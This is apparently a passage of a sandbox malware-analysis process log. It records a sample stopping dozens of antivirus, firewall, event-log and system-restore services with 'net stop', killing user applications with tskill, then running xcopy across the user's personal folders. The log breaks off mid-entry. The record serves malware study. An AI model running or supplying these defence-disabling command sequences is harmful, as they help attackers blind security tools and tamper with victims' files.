- C:\Windows\system32\net.exe
  net stop "McAfee Spamkiller Server" /y
  2⤵
  PID:4968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y
    3⤵
    PID:3188
- C:\Windows\system32\net.exe
  net stop "McAfee Personal Firewall Service" /y
  2⤵
  PID:2100
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y
    3⤵
    PID:4072
- C:\Windows\system32\net.exe
  net stop "McAfee SecurityCenter Update Manager" /y
  2⤵
  PID:2768
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y
    3⤵
    PID:4180
- C:\Windows\system32\net.exe
  net stop "Symantec SPBBCSvc" /y
  2⤵
  PID:2516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y
    3⤵
    PID:3824
- C:\Windows\system32\net.exe
  net stop "Ahnlab Task Scheduler" /y
  2⤵
  PID:228
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y
    3⤵
    PID:444
- C:\Windows\system32\net.exe
  net stop navapsvc /y
  2⤵
  PID:768
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop navapsvc /y
    3⤵
    PID:3104
- C:\Windows\system32\net.exe
  net stop "Sygate Personal Firewall Pro" /y
  2⤵
  PID:704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
    3⤵
    PID:3336
- C:\Windows\system32\net.exe
  net stop vrmonsvc /y
  2⤵
  PID:1104
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop vrmonsvc /y
    3⤵
    PID:4844
- C:\Windows\system32\net.exe
  net stop MonSvcNT /y
  2⤵
  PID:3668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MonSvcNT /y
    3⤵
    PID:1080
- C:\Windows\system32\net.exe
  net stop SAVScan /y
  2⤵
  PID:64
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVScan /y
    3⤵
    PID:3448
- C:\Windows\system32\net.exe
  net stop NProtectService /y
  2⤵
  PID:2872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NProtectService /y
    3⤵
    PID:2264
- C:\Windows\system32\net.exe
  net stop ccSetMGR /y
  2⤵
  PID:2296
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMGR /y
    3⤵
    PID:4812
- C:\Windows\system32\net.exe
  net stop ccEvtMGR /y
  2⤵
  PID:3928
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMGR /y
    3⤵
    PID:1656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y
    3⤵
    PID:4664
- C:\Windows\system32\net.exe
  net stop srservice /y
  2⤵
  PID:3936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop srservice /y
    3⤵
    PID:4152
- C:\Windows\system32\net.exe
  net stop "Symantec Network Drivers Service" /y
  2⤵
  PID:4360
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y
    3⤵
    PID:1064
- C:\Windows\system32\net.exe
  net stop "norton Unerase Protection" /y
  2⤵
  PID:4668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton Unerase Protection" /y
    3⤵
    PID:4508
- C:\Windows\system32\net.exe
  net stop MskService /y
  2⤵
  PID:4372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MskService /y
    3⤵
    PID:4424
- C:\Windows\system32\net.exe
  net stop MpfService /y
  2⤵
  PID:3164
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MpfService /y
    3⤵
    PID:3592
- C:\Windows\system32\net.exe
  net stop mcupdmgr.exe /y
  2⤵
  PID:484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mcupdmgr.exe /y
    3⤵
    PID:4956
- C:\Windows\system32\net.exe
  net stop "McAfeeAntiSpyware" /y
  2⤵
  PID:4504
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y
    3⤵
    PID:5104
- C:\Windows\system32\net.exe
  net stop helpsvc /y
  2⤵
  PID:4452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop helpsvc /y
    3⤵
    PID:4712
- C:\Windows\system32\net.exe
  net stop ERSvc /y
  2⤵
  PID:4708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ERSvc /y
    3⤵
    PID:3080
- C:\Windows\system32\net.exe
  net stop "*norton*" /y
  2⤵
  PID:4484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "*norton*" /y
    3⤵
    PID:4388
- C:\Windows\system32\net.exe
  net stop "*Symantec*" /y
  2⤵
  PID:972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "*Symantec*" /y
    3⤵
    PID:3076
- C:\Windows\system32\net.exe
  net stop "*McAfee*" /y
  2⤵
  PID:4180
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "*McAfee*" /y
    3⤵
    PID:312
- C:\Windows\system32\net.exe
  net stop ccPwdSvc /y
  2⤵
  PID:4748
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccPwdSvc /y
    3⤵
    PID:3772
- C:\Windows\system32\net.exe
  net stop "Symantec Core LC" /y
  2⤵
  PID:2168
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec Core LC" /y
    3⤵
    PID:3468
- C:\Windows\system32\net.exe
  net stop navapsvc /y
  2⤵
  PID:3336
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop navapsvc /y
    3⤵
    PID:1104
- C:\Windows\system32\net.exe
  net stop "Serv-U" /y
  2⤵
  PID:2672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Serv-U" /y
    3⤵
    PID:3492
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto Protect Service" /y
  2⤵
  PID:3532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
    3⤵
    PID:3508
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Client" /y
  2⤵
  PID:4272
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
    3⤵
    PID:3816
- C:\Windows\system32\net.exe
  net stop "Symantec AntiVirus Client" /y
  2⤵
  PID:2296
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y
    3⤵
    PID:4008
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Server" /y
  2⤵
  PID:3232
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Server" /y
    3⤵
    PID:3112
- C:\Windows\system32\net.exe
  net stop "NAV Alert" /y
  2⤵
  PID:2592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "NAV Alert" /y
    3⤵
    PID:4196
- C:\Windows\system32\net.exe
  net stop "Nav Auto-Protect" /y
  2⤵
  PID:4364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Nav Auto-Protect" /y
    3⤵
    PID:3204
- C:\Windows\system32\net.exe
  net stop "McShield" /y
  2⤵
  PID:3792
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McShield" /y
    3⤵
    PID:4068
- C:\Windows\system32\net.exe
  net stop "DefWatch" /y
  2⤵
  PID:3196
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "DefWatch" /y
    3⤵
    PID:4184
- C:\Windows\system32\net.exe
  net stop eventlog /y
  2⤵
  PID:4212
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop eventlog /y
    3⤵
    PID:2148
- C:\Windows\system32\net.exe
  net stop InoRPC /y
  2⤵
  PID:3076
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop InoRPC /y
    3⤵
    PID:312
- C:\Windows\system32\net.exe
  net stop InoRT /y
  2⤵
  PID:4180
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop InoRT /y
    3⤵
    PID:3772
- C:\Windows\system32\net.exe
  net stop InoTask /y
  2⤵
  PID:4748
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop InoTask /y
    3⤵
    PID:3468
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto Protect Service" /y
  2⤵
  PID:4792
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
    3⤵
    PID:1708
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Client" /y
  2⤵
  PID:3668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
    3⤵
    PID:2264
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Corporate Edition" /y
  2⤵
  PID:3448
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y
    3⤵
    PID:4996
- C:\Windows\system32\net.exe
  net stop "ViRobot Professional Monitoring" /y
  2⤵
  PID:3928
- C:\Windows\system32\net.exe
  net stop "PC-cillin Personal Firewall" /y
  2⤵
  PID:1092
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y
    3⤵
    PID:316
- C:\Windows\system32\net.exe
  net stop "Trend Micro Proxy Service" /y
  2⤵
  PID:4228
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y
    3⤵
    PID:4424
- C:\Windows\system32\net.exe
  net stop "Trend NT Realtime Service" /y
  2⤵
  PID:4064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Trend NT Realtime Service" /y
    3⤵
    PID:4184
- C:\Windows\system32\net.exe
  net stop "McAfee.com McShield" /y
  2⤵
  PID:8
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee.com McShield" /y
    3⤵
    PID:4216
- C:\Windows\system32\net.exe
  net stop "McAfee.com VirusScan Online Realtime Engine" /y
  2⤵
  PID:2252
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y
    3⤵
    PID:5092
- C:\Windows\system32\net.exe
  net stop "SyGateService" /y
  2⤵
  PID:4388
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SyGateService" /y
    3⤵
    PID:4392
- C:\Windows\system32\net.exe
  net stop "Sygate Personal Firewall Pro" /y
  2⤵
  PID:3316
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
    3⤵
    PID:2152
- C:\Windows\system32\net.exe
  net stop "Sophos Anti-Virus" /y
  2⤵
  PID:4408
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Anti-Virus" /y
    3⤵
    PID:1680
- C:\Windows\system32\net.exe
  net stop "Sophos Anti-Virus Network" /y
  2⤵
  PID:3400
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y
    3⤵
    PID:4284
- C:\Windows\system32\net.exe
  net stop "eTrust Antivirus Job Server" /y
  2⤵
  PID:4212
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y
    3⤵
    PID:2584
- C:\Windows\system32\net.exe
  net stop "eTrust Antivirus Realtime Server" /y
  2⤵
  PID:312
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y
    3⤵
    PID:228
- C:\Windows\system32\net.exe
  net stop "Sygate Personal Firewall Pro" /y
  2⤵
  PID:488
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
    3⤵
    PID:2384
- C:\Windows\system32\net.exe
  net stop "eTrust Antivirus RPC Server" /y
  2⤵
  PID:3680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y
    3⤵
    PID:2448
- C:\Windows\system32\net.exe
  net stop netsvcs
  2⤵
  PID:4000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop netsvcs
    3⤵
    PID:1708
- C:\Windows\system32\net.exe
  net stop spoolnt
  2⤵
  PID:4792
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop spoolnt
    3⤵
    PID:2264
- C:\Windows\system32\tskill.exe
  tskill iexplore
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3668
- C:\Windows\system32\tskill.exe
  tskill msnmsgr
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4996
- C:\Windows\system32\tskill.exe
  tskill excel
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3448
- C:\Windows\system32\tskill.exe
  tskill iTunes
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4812
- C:\Windows\system32\tskill.exe
  tskill calc
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4664
- C:\Windows\system32\tskill.exe
  tskill msaccess
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4652
- C:\Windows\system32\tskill.exe
  tskill safari
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1092
- C:\Windows\system32\tskill.exe
  tskill mspaint
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4068
- C:\Windows\system32\tskill.exe
  tskill outlook
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4364
- C:\Windows\system32\tskill.exe
  tskill WINWORD
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4372
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\AssertApprove.iso
  2⤵
  PID:4892
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\BackupOptimize.svgz
  2⤵
  PID:4452
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\BackupOut.gif
  2⤵
  PID:4040
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\BlockConnect.mpv2
  2⤵
  PID:1696
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\BlockStop.potm
  2⤵
  PID:1528
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\CompareLimit.vbe
  2⤵
  PID:2252
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\CompareRepair.ps1
  2⤵
  PID:4392
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\CopyEnter.vb
  2⤵
  PID:4388
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\DenySwitch.temp
  2⤵
  PID:2152
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\EnableUnregister.mhtml
  2⤵
  PID:3316
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\ExportSearch.kix
  2⤵
  PID:1384
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\InstallOptimize.wav
  2⤵
  PID:4408
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\MeasurePing.m4a
  2⤵
  PID:3164
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\Microsoft Edge.lnk
  2⤵
  PID:1124
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\MountWatch.au
  2⤵
  PID:2584
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\MoveAdd.reg
  2⤵
  PID:400
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\OptimizeOut.xsl
  2⤵
  PID:2056
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\PopSkip.zip
  2⤵
  PID:1076
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\RenameUse.potm
  2⤵
  PID:3696
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\RestartEdit.ppsm
  2⤵
  PID:4968
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\RestartImport.vstm
  2⤵
  PID:1080
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\RestoreEdit.TS
  2⤵
  PID:1104
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\RestorePublish.vsx
  2⤵
  PID:2188
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\SaveCheckpoint.xla
  2⤵
  PID:2672
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\SendWatch.dotm
  2⤵
  PID:3236
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\SplitReset.sql
  2⤵
  PID:64
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\SubmitFind.doc
  2⤵
  PID:1340
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\SuspendApprove.mhtml
  2⤵
  PID:2812
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\SuspendUse.vsdm
  2⤵
  PID:4508
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\WaitUnlock.easmx
  2⤵
  PID:4196
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\ApproveWrite.mht
  2⤵
  PID:2960
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\Are.docx
  2⤵
  PID:1372
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\black.bat
  2⤵
  PID:4228
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\CheckpointDismount.ppt
  2⤵
  PID:4184
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\CompressCheckpoint.ppsm
  2⤵
  PID:4660
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\CompressDismount.ppsm
  2⤵
  PID:3296
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\CompressSync.txt
  2⤵
  PID:8
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\CopyGet.docx
  2⤵
  PID:1436
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\EditOpen.vst
  2⤵
  PID:1696
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\EnterUndo.xls
  2⤵
  PID:2916
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\ExportReceive.mht
  2⤵
  PID:4940
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\Files.docx
  2⤵
  PID:4688
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\FormatMerge.vsd
  2⤵
  PID:4888
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\GetRemove.ppt
  2⤵
  PID:4376
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\MountHide.vssx
  2⤵
  PID:2112
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\Opened.docx
  2⤵
  PID:1384
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\OptimizeHide.xlsx
  2⤵
  PID:4408
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\PingReceive.pptx
  2⤵
  PID:1672
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\PingRegister.xltm
  2⤵
  PID:1124
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\ProtectStart.vsdm
  2⤵
  PID:2584
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\Recently.docx
  2⤵
  PID:400
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\RenameEdit.vstx
  2⤵
  PID:2056
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\ResizePing.vsd
  2⤵
  PID:1076
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\ResizeSearch.vsw
  2⤵
  PID:3696
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\ResolveTrace.vsd
  2⤵
  PID:452
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\RestoreDebug.docx
  2⤵
  PID:1708
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\RestoreInstall.odt
  2⤵
  PID:3600
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\SelectMerge.doc
  2⤵
  PID:3576
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\ShowCopy.mpp
  2⤵
  PID:3228
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\StartRead.mhtml
  2⤵
  PID:1028
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\These.docx
  2⤵
  PID:3128
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\TraceSet.mpp
  2⤵
  PID:3448
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\UnlockPush.vstm
  2⤵
  PID:3932
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\WriteGrant.dotm
  2⤵
  PID:3628
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\BackupShow.TTS
  2⤵
  PID:2360
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\BlockEdit.DVR
  2⤵
  PID:4196
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\ConvertToOpen.pptm
  2⤵
  PID:2960
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\DenyPing.docm
  2⤵
  PID:4068
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\EnableApprove.mhtml
  2⤵
  PID:4232
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\GetSearch.asp
  2⤵
  PID:4264
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\HideResolve.eps
  2⤵
  PID:2124
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\MergeReceive.css
  2⤵
  PID:8
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\MergeUnprotect.gif
  2⤵
  PID:4456
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\NewMount.mov
  2⤵
  PID:3080
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\PingPublish.scf
  2⤵
  PID:4392
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\ResizeClose.bin
  2⤵
  PID:4388
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\SelectRead.mpeg
  2⤵
  PID:2868
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\ShowLimit.zip
  2⤵
  PID:3316
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\StartHide.scf
  2⤵
  PID:1228
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\SuspendRedo.mp4v
  2⤵
  PID:636
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\UnblockEdit.iso
  2⤵
  PID:1384
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\UnprotectJoin.aiff
  2⤵
  PID:2148
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Music\WaitMeasure.dwfx
  2⤵
  PID:3076
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\GroupMount.pcx
  2⤵
  PID:1124
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\HideDisconnect.ico
  2⤵
  PID:204
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\MoveClose.wmf
  2⤵
  PID:3468
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\MoveDisable.wmf
  2⤵
  PID:4180
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\My Wallpaper.jpg
  2⤵
  PID:4192
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\RegisterHide.emz
  2⤵
  PID:3680
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\RepairGroup.cr2
  2⤵
  PID:3464
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\RequestMove.tiff
  2⤵
  PID:2316
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\RestoreTrace.emf
  2⤵
  PID:2672
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\SaveStep.crw
  2⤵
  PID:3336
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\SkipRepair.emf
  2⤵
  PID:3576
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\StartResolve.gif
  2⤵
  PID:1028
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\StopCopy.emf
  2⤵
  PID:4812
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\SuspendLock.svg
  2⤵
  PID:3128
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\SuspendRename.jpeg
  2⤵
  PID:3932
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\UninstallInstall.raw
  2⤵
  PID:3628
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\UnpublishStart.ico
  2⤵
  PID:316
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Pictures\WriteProtect.png
  2⤵
  PID:2360
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\ApproveStop.MTS
  2⤵
  PID:4036
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\ClearRemove.mid
  2⤵
  PID:4228
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\CompleteSelect.cmd
  2⤵
  PID:4184
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\ConfirmRevoke.ppsm
  2⤵
  PID:3588
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\ConfirmUninstall.dwg
  2⤵
  PID:4144
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\ConvertBackup.xla
  2⤵
  PID:1436
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\CopyMove.crw
  2⤵
  PID:3368
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\DebugRevoke.ppsm
  2⤵
  PID:4944
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\DebugSync.jpg
  2⤵
  PID:4412
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\DebugUpdate.mhtml
  2⤵
  PID:4148
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\EditRequest.mpe
  2⤵
  PID:3080
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\EnableComplete.temp
  2⤵
  PID:792
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\FindPush.iso
  2⤵
  PID:1640
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\LimitExpand.iso
  2⤵
  PID:4376
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\MeasureInitialize.doc
  2⤵
  PID:1228
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\MergeAssert.ini
  2⤵
  PID:4284
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\MountFind.jtx
  2⤵
  PID:100
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\OpenDisconnect.pptm
  2⤵
  PID:1672
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\RedoUse.vdw
  2⤵
  PID:524
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\RemoveSync.bmp
  2⤵
  PID:228
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\RemoveUnlock.rtf
  2⤵
  PID:400
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\RepairReceive.TTS
  2⤵
  PID:204
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\ResetUnpublish.wma
  2⤵
  PID:768
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\ResizePop.mht
  2⤵
  PID:3104
- C:\Windows\system32\xcopy.exe
